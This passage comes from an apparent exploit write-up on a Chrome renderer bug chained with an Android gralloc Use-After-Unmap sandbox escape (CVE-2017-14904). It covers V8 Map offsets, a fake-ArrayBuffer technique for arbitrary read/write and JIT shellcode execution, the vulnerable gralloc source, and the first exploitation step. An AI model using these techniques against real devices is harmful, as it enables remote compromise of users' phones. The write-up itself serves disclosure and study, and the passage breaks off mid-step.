/* Map layouts 44 Bytes*/
static kMapOffset = 0,
static kInstanceSizesOffset = 4,
static kInstanceAttributesOffset = 8,
static kBitField3Offset = 12,
static kPrototypeOffset = 16,
static kConstructorOrBackPointerOffset = 20,
static kTransitionsOrPrototypeInfoOffset = 24,
static kDescriptorsOffset = 28,
static kLayoutDescriptorOffset = 1,
static kCodeCacheOffset = 32,
static kDependentCodeOffset = 36,
static kWeakCellCacheOffset = 40,
static kPointerFieldsBeginOffset = 16,
static kPointerFieldsEndOffset = 44,
static kInstanceSizeOffset = 4,
static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5,
static kUnusedOffset = 6,
static kVisitorIdOffset = 7,
static kInstanceTypeOffset = 8, //one byte
static kBitFieldOffset = 9,
static kInstanceTypeAndBitFieldOffset = 8,
static kBitField2Offset = 10,
static kUnusedPropertyFieldsOffset = 11
Because the content of the stack can be leaked, we can get many useful pieces of data with which to fake the ArrayBuffer. For example, we can leak the start address of an object and calculate the start address of its elements, which is a FixedArray object. We can use this FixedArray object as the faked ArrayBuffer's Properties and Elements fields.

We have to fake the Map of the ArrayBuffer too. Luckily, most of the fields of the Map are not used when the bug is triggered, but the InstanceType at offset 8 has to be set to 0xc3 (this value depends on the version of v8) to indicate that this object is an ArrayBuffer. In order to get a reference to the faked ArrayBuffer in JavaScript, we have to set the Prototype field of the Map at offset 16 to an object whose Symbol.toPrimitive property is a JavaScript callback function. When the faked ArrayBuffer is passed to the ToNumber function to convert the ArrayBuffer object to a Number, the callback function is called, so we can get a reference to the faked ArrayBuffer inside the callback.

Because the ArrayBuffer is faked in a double array, the content of the array can be set to any value, so we can change the BackingStore and ByteLength fields of the faked ArrayBuffer to get arbitrary memory read and write. With arbitrary memory read/write, executing shellcode is simple: since JIT code in Chrome is readable, writable, and executable, we can overwrite it to execute shellcode.
The Chrome team fixed this bug very quickly, in Chrome 61.0.3163.79, just a week after I submitted the exploit.
The EoP Bug (CVE-2017-14904)

The sandbox escape bug is caused by a mismatch between map and unmap, which leads to a Use-After-Unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap:
static int gralloc_map(gralloc_module_t const* module,
                       buffer_handle_t handle)
{
    ……
    private_handle_t* hnd = (private_handle_t*)handle;
    ……
    if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) &&
        !(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) {
        size = hnd->size;
        err = memalloc->map_buffer(&mappedAddress, size,
                                   hnd->offset, hnd->fd); //---> maps an ashmem region and gets the mapped address; the ashmem fd and offset can be controlled by the Chrome render process
        if(err || mappedAddress == MAP_FAILED) {
            ALOGE("Could not mmap handle %p, fd=%d (%s)",
                  handle, hnd->fd, strerror(errno));
            return -errno;
        }
        hnd->base = uint64_t(mappedAddress) + hnd->offset; //---> save mappedAddress + offset to hnd->base
    } else {
        err = -EACCES;
    }
    ……
    return err;
}
gralloc_map maps a graphic buffer, controlled by the argument handle, into memory space, and gralloc_unmap unmaps it. While mapping, mappedAddress plus hnd->offset is stored to hnd->base; but while unmapping, hnd->base is passed directly to the unmap system call without subtracting the offset. hnd->offset can be manipulated from Chrome's sandboxed process, so it's possible to unmap any pages in system_server from Chrome's sandboxed render process.
static int gralloc_unmap(gralloc_module_t const* module,
                         buffer_handle_t handle)
{
    ……
    if(hnd->base) {
        err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset); //---> while unmapping, hnd->offset is not used; hnd->base is used as the base address, so map and unmap are mismatched
        if (err) {
            ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base,
                  strerror(errno));
            return -errno;
        }
        hnd->base = 0;
    }
    ……
    return 0;
}

int IonAlloc::unmap_buffer(void *base, unsigned int size,
                           unsigned int /*offset*/)
//---> look, offset is not used by unmap_buffer
{
    int err = 0;
    if(munmap(base, size)) {
        err = -errno;
        ALOGE("ion: Failed to unmap memory at %p : %s",
              base, strerror(errno));
    }
    return err;
}
Although SELinux restricts the isolated_app domain from accessing most Android system services, isolated_app can still access three of them:
neverallow isolated_app {
    service_manager_type
    -activity_service
    -display_service
    -webviewupdate_service
}:service_manager find;
To trigger the aforementioned Use-After-Unmap bug from Chrome's sandbox, first put a GraphicBuffer object, which is parcelable, into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered.
This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome's Sandbox in Android. It is also similar to Bitunmap, except exploiting it from a sandboxed Chrome render process is more difficult than from an app.
To exploit this EoP bug:
1. Address space shaping. Make the address space layout look as follows: a heap chunk sits right above some contiguous ashmem mappings:
7f54600000-7f54800000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f54800000-7f54a00000 rw-s 001fe000 00:04 32783 /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781 /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779 /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04..